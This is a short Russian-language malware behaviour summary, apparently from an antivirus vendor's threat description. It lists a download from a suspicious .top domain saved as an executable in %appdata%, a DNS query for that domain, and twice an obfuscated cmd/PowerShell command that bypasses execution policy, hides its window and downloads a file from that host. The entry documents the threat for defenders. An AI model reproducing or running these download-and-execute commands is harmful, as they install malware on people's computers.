Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweR^s^helL.^EXE^ -^exeC^u^TIonpOliCY byPaSs -^nOp^ROFiLE^ ^-w^iNdO^wSTYLE hi^d^d^En (nEW-^o^BjecT^ SYs^TEm.NET.^W^EBC^l^I^e^NT).dowNLOA^dfILE('http://zofelaseo.top/read.ph...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "POweR^s^helL.^EXE^ -^exeC^u^TIonpOliCY byPaSs -^nOp^ROFiLE^ ^-w^iNdO^wSTYLE hi^d^d^En (nEW-^o^BjecT^ SYs^TEm.NET.^W^EBC^l^I^e^NT).dowNLOA^dfILE('http://zofelaseo.top/read.ph...' (со скрытым окном)